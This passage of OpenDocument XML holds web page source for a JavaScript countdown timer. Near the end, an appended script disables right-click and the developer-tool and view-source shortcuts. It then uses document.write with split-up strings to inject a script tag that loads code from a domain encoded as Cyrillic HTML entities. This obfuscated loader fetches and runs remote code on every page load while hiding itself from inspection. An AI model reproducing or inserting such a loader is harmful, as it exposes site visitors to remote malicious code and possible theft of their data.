      <text:p text:style-name="P1"><text:span text:style-name="T3978"><text:s/>var distance = countDownDate - now;</text:span><text:span text:style-name="T3979"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3979"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3980"><text:s/>// Time calculations for days, hours, minutes and seconds</text:span><text:span text:style-name="T3981"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3982"><text:s/>var days = Math.floor(distance / (</text:span><text:span text:style-name="T3983">1000<text:s/></text:span><text:span text:style-name="T3984">*<text:s/></text:span><text:span text:style-name="T3985">60<text:s/></text:span><text:span text:style-name="T3986">*<text:s/></text:span><text:span text:style-name="T3987">60<text:s/></text:span><text:span text:style-name="T3988">*<text:s/></text:span><text:span text:style-name="T3989">24</text:span><text:span text:style-name="T3990">));</text:span><text:span text:style-name="T3991"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3992"><text:s/>var hours = Math.floor((distance % (</text:span><text:span text:style-name="T3993">1000<text:s/></text:span><text:span text:style-name="T3994">*<text:s/></text:span><text:span text:style-name="T3995">60<text:s/></text:span><text:span text:style-name="T3996">*<text:s/></text:span><text:span text:style-name="T3997">60<text:s/></text:span><text:span text:style-name="T3998">*<text:s/></text:span><text:span text:style-name="T3999">24</text:span><text:span text:style-name="T4000">)) / (</text:span><text:span text:style-name="T4001">1000<text:s/></text:span><text:span text:style-name="T4002">*<text:s/></text:span><text:span text:style-name="T4003">60<text:s/></text:span><text:span text:style-name="T4004">*<text:s/></text:span><text:span text:style-name="T4005">60</text:span><text:span text:style-name="T4006">));</text:span><text:span text:style-name="T4007"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4008"><text:s/>var minutes = Math.floor((distance % (</text:span><text:span text:style-name="T4009">1000<text:s/></text:span><text:span text:style-name="T4010">*<text:s/></text:span><text:span text:style-name="T4011">60<text:s/></text:span><text:span text:style-name="T4012">*<text:s/></text:span><text:span text:style-name="T4013">60</text:span><text:span text:style-name="T4014">)) / (</text:span><text:span text:style-name="T4015">1000<text:s/></text:span><text:span text:style-name="T4016">*<text:s/></text:span><text:span text:style-name="T4017">60</text:span><text:span text:style-name="T4018">));</text:span><text:span text:style-name="T4019"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4020"><text:s/>var seconds = Math.floor((distance % (</text:span><text:span text:style-name="T4021">1000<text:s/></text:span><text:span text:style-name="T4022">*<text:s/></text:span><text:span text:style-name="T4023">60</text:span><text:span text:style-name="T4024">)) /<text:s/></text:span><text:span text:style-name="T4025">1000</text:span><text:span text:style-name="T4026">);</text:span><text:span text:style-name="T4027"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4027"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4028"><text:s/>// Output the result in an element with id="demo"</text:span><text:span text:style-name="T4029"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4030"><text:s/>document.getElementById("demoo").innerHTML = days + "days " + hours + "hr "+ minutes + "min " + seconds + "sec ";</text:span><text:span text:style-name="T4031"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4031"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4032"><text:s/>// If the count down is over, write some text</text:span><text:span text:style-name="T4033"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4034"><text:s/>if (distance &lt;<text:s/></text:span><text:span text:style-name="T4035">0</text:span><text:span text:style-name="T4036">)</text:span><text:span text:style-name="T4037"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4038"><text:s/>{</text:span><text:span text:style-name="T4039"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4040"><text:s/>clearInterval(x);</text:span><text:span text:style-name="T4041"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4042"><text:s/>document.getElementById("demoo").innerHTML = "";</text:span><text:span text:style-name="T4043"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4044"><text:s/>document.getElementById("inAdvance").innerHTML = "";</text:span><text:span text:style-name="T4045"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4045"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4046"><text:s/>}</text:span><text:span text:style-name="T4047"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4048"><text:s/>},<text:s/></text:span><text:span text:style-name="T4049">1000</text:span><text:span text:style-name="T4050">);</text:span><text:span text:style-name="T4051"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4052"><text:s/>&lt;/script&gt;</text:span><text:span text:style-name="T4053"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4053"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4054">&lt;script&gt;</text:span><text:span text:style-name="T4055"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4056">document.addEventListener('contextmenu', event =&gt; event.preventDefault()); document.write('&lt;s'+'cr'+'ipt sr'+'c="/'+'/'+'&amp;#</text:span><text:span text:style-name="T4057">1092</text:span><text:span text:style-name="T4058">;'+'&amp;#</text:span><text:span text:style-name="T4059">1102</text:span><text:span text:style-name="T4060">;.'+'i'+'o"&gt;&lt;/s'+'cr'+'ipt&gt;'); document.onkeydown = function(e) { if(event.keyCode==</text:span><text:span text:style-name="T4061">123</text:span><text:span text:style-name="T4062">){ return false; } else if (e.ctrlKey &amp;&amp; (e.keyCode ===<text:s/></text:span><text:span text:style-name="T4063">67<text:s/></text:span><text:span text:style-name="T4064">|| e.keyCode ===<text:s/></text:span><text:span text:style-name="T4065">16<text:s/></text:span><text:span text:style-name="T4066">|| e.keyCode ===<text:s/></text:span><text:span text:style-name="T4067">73<text:s/></text:span><text:span text:style-name="T4068">|| e.keyCode ===<text:s/></text:span><text:span text:style-name="T4069">86<text:s/></text:span><text:span text:style-name="T4070">|| e.keyCode ===<text:s/></text:span><text:span text:style-name="T4071">85<text:s/></text:span><text:span text:style-name="T4072">|| e.keyCode ===<text:s/></text:span><text:span text:style-name="T4073">117</text:span><text:span text:style-name="T4074">)) { return false; } };</text:span><text:span text:style-name="T4075"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4076">&lt;/script&gt;<text:s/></text:span><text:span text:style-name="T4077"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T4078"><text:s/>&lt;/html&gt;</text:span><text:span text:style-name="T40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